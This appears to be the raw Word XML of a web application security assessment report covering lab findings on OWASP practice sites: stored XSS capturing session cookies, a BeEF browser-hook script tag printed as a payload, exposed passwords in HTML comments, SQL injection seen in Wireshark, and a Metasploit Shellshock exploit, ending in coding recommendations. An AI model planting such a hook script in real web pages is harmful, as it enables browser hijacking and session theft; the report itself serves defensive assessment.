    <w:p w14:paraId="04A3F8AB" w14:textId="77777777" w:rsidR="00152D4B" w:rsidRDefault="00152D4B" w:rsidP="00152D4B"/>
    <w:p w14:paraId="218764EE" w14:textId="77777777" w:rsidR="00152D4B" w:rsidRDefault="00152D4B" w:rsidP="00152D4B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc46402724"/>
      <w:r>
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00B778E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006860F0">
        <w:t xml:space="preserve">(XSS) </w:t>
      </w:r>
      <w:r w:rsidR="00B778E8">
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6237C9C3" w14:textId="77777777" w:rsidR="00152D4B" w:rsidRDefault="00152D4B" w:rsidP="00152D4B"/>
    <w:p w14:paraId="1DDF44B8" w14:textId="2EB98AE1" w:rsidR="00310739" w:rsidRPr="00310739" w:rsidRDefault="00310739" w:rsidP="00152D4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00310739">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious </w:t>
      </w:r>
      <w:r w:rsidR="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidRPr="00310739">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">was embedded in a blog to capture </w:t>
      </w:r>
      <w:r w:rsidR="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">session </w:t>
      </w:r>
      <w:r w:rsidRPr="00310739">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cookie information from port 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74FB8A" w14:textId="45414A61" w:rsidR="00EC559F" w:rsidRDefault="00EC559F" w:rsidP="00EC559F"/>
    <w:p w14:paraId="74CF5063" w14:textId="1AEC4840" w:rsidR="00310739" w:rsidRDefault="00AD1A16" w:rsidP="00EC559F">
      <w:r w:rsidRPr="0023527B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265B09EF" wp14:editId="2E7D6083">
            <wp:extent cx="4142740" cy="12325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2740" cy="1232535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2D5C4" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00EC559F"/>
    <w:p w14:paraId="2A2FAB21" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00EC559F"/>
    <w:p w14:paraId="01C4CC30" w14:textId="5955ED76" w:rsidR="00B778E8" w:rsidRDefault="00310739" w:rsidP="00B778E8">
      <w:r>
        <w:t>We were able to scan the port using Netscape and see the cookie for a user’s session was passed through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0D27C" w14:textId="224B430E" w:rsidR="00310739" w:rsidRDefault="00AD1A16" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023527B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6610DA" wp14:editId="60290FAD">
            <wp:extent cx="5486400" cy="23215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321560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5978F0A7" w14:textId="3533860F" w:rsidR="00310739" w:rsidRDefault="00310739" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A34B936" w14:textId="1FBAFAFC" w:rsidR="003B4BAB" w:rsidRDefault="00310739" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Browser exploitation framework aka BeEf exposed how hackers could  control user’s web browsers</w:t>
      </w:r>
      <w:r w:rsidR="003B4BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> with this malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23D36F" w14:textId="1E4767EC" w:rsidR="003B4BAB" w:rsidRDefault="003B4BAB" w:rsidP="003B4BAB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="LiberationSans" w:hAnsi="LiberationSans" w:cs="LiberationSans"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348B6767" w14:textId="78730CC2" w:rsidR="003B4BAB" w:rsidRDefault="003B4BAB" w:rsidP="003B4BAB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="LiberationSans-Bold" w:hAnsi="LiberationSans-Bold" w:cs="LiberationSans-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;script src="http://127.0.0.1:3000/hook.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AAC92A" w14:textId="13B226E9" w:rsidR="00310739" w:rsidRDefault="00310739" w:rsidP="00B778E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>They could also install additional software on to the unaware user’s web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9ED94" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00C23226" w:rsidP="00B778E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc46402725"/>
      <w:r>
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
      <w:r w:rsidR="00B778E8">
        <w:t xml:space="preserve"> Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="447C440C" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8"/>
    <w:p w14:paraId="5D909406" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8B8D03" w14:textId="368123E2" w:rsidR="00B778E8" w:rsidRPr="003B4BAB" w:rsidRDefault="003B4BAB" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTML comments left by developers left the database password embedded in the comments on a public website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD75F9" w14:textId="2B64EB20" w:rsidR="00B778E8" w:rsidRDefault="00AD1A16" w:rsidP="00B778E8">
      <w:r w:rsidRPr="0023527B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D531195" wp14:editId="58CF7FC1">
            <wp:extent cx="5486400" cy="163766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637665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9388AF" w14:textId="05EEA038" w:rsidR="00B778E8" w:rsidRDefault="003B4BAB" w:rsidP="00B778E8">
      <w:r>
        <w:t>Other tools like Disburster exposed files and directories left on the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8526E3" w14:textId="2FE72146" w:rsidR="003B4BAB" w:rsidRDefault="003B4BAB" w:rsidP="00B778E8">
      <w:r>
        <w:t>Finally, verbose error messages meant for developers was left configured on an account web page exposing the database name and query upon error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF5008" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc46402726"/>
      <w:r>
        <w:t>SQL Injections Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="38DE0E0F" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8"/>
    <w:p w14:paraId="39CE3668" w14:textId="4FCD945C" w:rsidR="00C23226" w:rsidRPr="003B4BAB" w:rsidRDefault="003B4BAB" w:rsidP="00C23226">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidR="00D2185B" w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wireshark,</w:t>
      </w:r>
      <w:r w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we were able to scan a </w:t>
      </w:r>
      <w:r w:rsidR="00D2185B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> query that came nested in a </w:t>
      </w:r>
      <w:r w:rsidR="00D2185B" w:rsidRPr="003B4BAB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r w:rsidR="00D2185B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidR="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.  We then tracked the packet using TCP stream to identify the </w:t>
      </w:r>
      <w:r w:rsidR="00210841">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">logic of the </w:t>
      </w:r>
      <w:r w:rsidR="00D2185B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00210841">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection attack which was to disclose one of 20 items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B04CB" w14:textId="6133B862" w:rsidR="003B4BAB" w:rsidRDefault="003B4BAB" w:rsidP="00C23226">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1835833C" w14:textId="7B8643AD" w:rsidR="003B4BAB" w:rsidRPr="00B778E8" w:rsidRDefault="00AD1A16" w:rsidP="00C23226">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023527B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55227371" wp14:editId="2CA2C5AD">
            <wp:extent cx="5486400" cy="38163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816350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A0F45" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRPr="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F89B97" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8"/>
    <w:p w14:paraId="3775BB4F" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8"/>
    <w:p w14:paraId="3A9F9C2B" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00B778E8" w:rsidP="00B778E8"/>
    <w:p w14:paraId="1836E8A1" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRDefault="00C23226" w:rsidP="00B778E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc46402727"/>
      <w:r>
        <w:t xml:space="preserve">Components With Known Vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00B778E8">
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="1243102D" w14:textId="45B069B9" w:rsidR="00C23226" w:rsidRPr="00A83733" w:rsidRDefault="00A83733" w:rsidP="00C23226">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Nikto we ran a scan on the webserver by entering the host name and retrieve the operating system version of the web server. Then we </w:t>
      </w:r>
      <w:r w:rsidR="0086611E" w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">used </w:t>
      </w:r>
      <w:r w:rsidR="000426E9" w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit to</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> check if the server is vulnerable to Shell shock.  Then we were able to use </w:t>
      </w:r>
      <w:r w:rsidR="0086611E" w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shellshock module to exploit the web </w:t>
      </w:r>
      <w:r w:rsidR="000426E9" w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>server’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83733">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D038C2" w14:textId="5765A97C" w:rsidR="00C23226" w:rsidRDefault="00C23226" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7223E57E" w14:textId="4E8036F6" w:rsidR="00A83733" w:rsidRDefault="00AD1A16" w:rsidP="00B778E8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023527B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15275125" wp14:editId="1C1E3912">
            <wp:extent cx="5486400" cy="420624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206240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E3CFA" w14:textId="77777777" w:rsidR="00152D4B" w:rsidRDefault="00152D4B" w:rsidP="00EC559F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F15F5C5" w14:textId="77777777" w:rsidR="00EC559F" w:rsidRDefault="00EC559F" w:rsidP="00EC559F"/>
    <w:p w14:paraId="18827430" w14:textId="77777777" w:rsidR="00B778E8" w:rsidRPr="00EC559F" w:rsidRDefault="00B778E8" w:rsidP="00EC559F"/>
    <w:p w14:paraId="5FB0254F" w14:textId="77777777" w:rsidR="000A251E" w:rsidRDefault="000A251E" w:rsidP="0002448A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc46402728"/>
      <w:r>
        <w:t>Source Code Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="039439AB" w14:textId="77777777" w:rsidR="000A251E" w:rsidRDefault="000A251E" w:rsidP="000A251E"/>
    <w:p w14:paraId="749D12BF" w14:textId="60CE0E0A" w:rsidR="009C5179" w:rsidRDefault="00210841" w:rsidP="000A251E">
      <w:r>
        <w:t xml:space="preserve">The lab results above revealed vulnerabilities in source code configuration on several </w:t>
      </w:r>
      <w:r w:rsidR="00376EDE">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wasp websites. Along with vulnerabilities, sensitive data exposure, XSS and </w:t>
      </w:r>
      <w:r w:rsidR="00376EDE">
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> injection attacks identified. I would recommend best practices in coding in any language to be aware of client data that is used as input. The data that the client inputs should always be encoded and escaped and never be left inside a query.</w:t>
      </w:r>
      <w:r w:rsidR="009C5179">
        <w:t xml:space="preserve"> Any part of the web application that interacts with a database needs to have appropriate debugging and logging to limit the exposure of errors to only developers. Any exposure of the database name or sql version is a vulnerability. A tool like Nikto could be used to identify the exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E01C89" w14:textId="77777777" w:rsidR="009C5179" w:rsidRPr="000A251E" w:rsidRDefault="009C5179" w:rsidP="000A251E"/>
    <w:p w14:paraId="65009496" w14:textId="77777777" w:rsidR="0002448A" w:rsidRDefault="002C0F59" w:rsidP="0002448A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc46402729"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">OWASP ASVS Level 1A </w:t>
      </w:r>
      <w:r w:rsidR="0002448A">
        <w:t>Verification Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="62511B54" w14:textId="77777777" w:rsidR="000C1C85" w:rsidRDefault="000C1C85" w:rsidP="005B74DC">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C924160" w14:textId="77777777" w:rsidR="00DB064B" w:rsidRDefault="00A019C1" w:rsidP="00DB064B">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00A905F3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00DB064B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lists the Level 1A verification requirements and whether the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2F43C" w14:textId="77777777" w:rsidR="00DB064B" w:rsidRDefault="00DB064B" w:rsidP="00DB064B">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assessment results are pass or fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC0A55F" w14:textId="77777777" w:rsidR="00B83209" w:rsidRDefault="00B83209" w:rsidP="00DB064B">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0E5BF4" w14:textId="77777777" w:rsidR="00997BF5" w:rsidRPr="009107BE" w:rsidRDefault="00997BF5" w:rsidP="0002448A"/>
    <w:p w14:paraId="44EA7EBA" w14:textId="77777777" w:rsidR="0002448A" w:rsidRDefault="002C0F59" w:rsidP="0002448A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc46402730"/>
      <w:r>
        <w:t xml:space="preserve">OWASP ASVS Level 1B </w:t>
      </w:r>
      <w:r w:rsidR="0002448A">
        <w:t>Verification Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="730C6C4D" w14:textId="77777777" w:rsidR="009107BE" w:rsidRDefault="009107BE" w:rsidP="005B74DC">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA3B1CB" w14:textId="77777777" w:rsidR="00DB064B" w:rsidRDefault="00A019C1" w:rsidP="00DB064B">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00DB064B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lists the Level 1B verification requirements and whether the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E8A146" w14:textId="77777777" w:rsidR="00DB064B" w:rsidRDefault="00DB064B" w:rsidP="00DB064B">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assessment results are pass or fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CB059" w14:textId="77777777" w:rsidR="00B83209" w:rsidRDefault="00B83209" w:rsidP="0002448A"/>
    <w:p w14:paraId="5A16195A" w14:textId="77777777" w:rsidR="00083779" w:rsidRDefault="003C5627" w:rsidP="00083779">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc46402731"/>
      <w:r>
        <w:t xml:space="preserve">Web Server </w:t>
      </w:r>
      <w:r w:rsidR="0094295D">
        <w:t xml:space="preserve">NIST </w:t>
      </w:r>
      <w:r w:rsidR="00083779">
        <w:t>Verification Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1CD7756D" w14:textId="77777777" w:rsidR="00083779" w:rsidRDefault="00083779" w:rsidP="0002448A"/>
    <w:p w14:paraId="10C0A760" w14:textId="77777777" w:rsidR="00DB064B" w:rsidRDefault="00A019C1" w:rsidP="00DB064B">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00980D57">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ppendix </w:t>
      </w:r>
      <w:r w:rsidR="00DB064B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lists the web server NIST verification Level 1A verification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E1BA02" w14:textId="77777777" w:rsidR="00DB064B" w:rsidRDefault="00DB064B" w:rsidP="00F90273">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>requirements and whether the assessme</w:t>
      </w:r>
      <w:r w:rsidR="00F90273">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nt results are pass or fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9B80A" w14:textId="77777777" w:rsidR="00A905F3" w:rsidRDefault="00A905F3" w:rsidP="00F90273">
      <w:pPr>
        <w:ind w:left="2016" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789B9E8F" w14:textId="77777777" w:rsidR="00B24DB9" w:rsidRDefault="00B24DB9" w:rsidP="00B24DB9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc46402732"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommend</w:t>
      </w:r>
      <w:r w:rsidR="000D46F8">
        <w:t>ed Remediation Actions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
